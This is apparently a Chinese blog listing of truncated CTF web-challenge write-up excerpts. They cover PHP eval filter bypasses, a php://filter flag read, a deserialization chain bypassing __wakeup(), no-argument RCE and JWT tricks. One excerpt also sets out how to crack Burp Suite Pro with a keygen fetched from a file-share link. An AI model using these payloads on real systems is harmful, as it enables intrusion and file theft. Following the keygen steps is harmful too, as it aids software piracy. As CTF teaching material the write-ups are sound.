2023冬季挑战赛 cool（WEB） <?php if(isset($_GET['a'])){ $a=$_GET['a']; if(is_numeric($a)){ echo"no"; } if(!preg_match("/flag|system|php/i",$a)){ eval（$a); } }else{ highlight_file(__FILE__); } ?> payload ?a=passthru("catfla\g.txt"); phpurl（WEB） base64解密aW5kZXgucGhwcw得到文件名index.phps <?php if("x...

web ezhttp easy_php POST/?syc=welcome%20to%20GEEK%202023!&lover=2e4HTTP/2 Host:sdjmytlkvr9c2362p1nccahfa.node.game.sycsec.com Sec-Ch-Ua:"Chromium";v="105","Not)A;Brand";v="8" Sec-Ch-Ua-Mobile:?0 Sec-Ch-Ua-Platform:"macOS" Upgrade-Insecure-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x...

记录一个反序列化中利用代码逻辑绕过__wakeup()函数的方法 题目代码 <?php error_reporting(0); classmouse { public$rice; function__isset($n){ $this->rice->nothing(); } } classdog { public$a; public$b; public$c; function__wakeup(){ $this->a='chance?'; } function__destruct(){ $this->b=$this->c; die($this->a...

无参数RCE就从ctfshow的web40说起吧，先看一下这道题 <?php / -coding:utf-8-- @Author:h1xa @Date:2020-09-0400:12:34 @LastModifiedby:h1xa @LastModifiedtime:2020-09-0406:03:36 @email:h1xa@ctfer.com @link:https://ctfer.com / if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/[0-9]|\|\`|\@|\|\\$|\%|\^|\&|\|\（...

web include 源码 <?php error_reporting(0); if(isset($_GET['SICTF'])){ if(substr($_GET["SICTF"],0,3)="php"){ echo"你好厉害呀"; include($_GET["SICTF"]); } else{ echo"你干嘛"; } }else{ highlight_file(__FILE__); } payload?SICTF=php://filter/read=convert.base64-encode/resource=/flag Baby_PHP <?php high...

Web-web1 <?php classHacker{ private$exp; private$cmd; publicfunction__toString() { call_user_func('system',"cat/flag"); } } classA { public$hacker; publicfunction__toString() { echo$this->hacker->name; return""; } } classC { public$finish; publicfunction__get($value) { $this->finish-...

准备工具 burp官方burpsuite_pro_macos_arm64_v2023_10_3_3.dmg BurpLoaderKeygen.jar：链接:https://pan.baidu.com/s/11f5lRGPwP4mINIAkZLci6Q?pwd=yq8b提取码:yq8b 修改vmoptions.txt文件，添加如下内容 --add-opens=java.desktop/javax.swing=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/jdk.internal.o...

web jwt2struts 解题 抓包 访问JWT_key.php <?php highlight_file(__FILE__); include"./secret_key.php"; include"./salt.php"; //$salt=XXXXXXXXXXXXXX//thesaltinclude14characters //md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df @$username=urldecode($_POST["username"]); @$password=urldecode($_POST...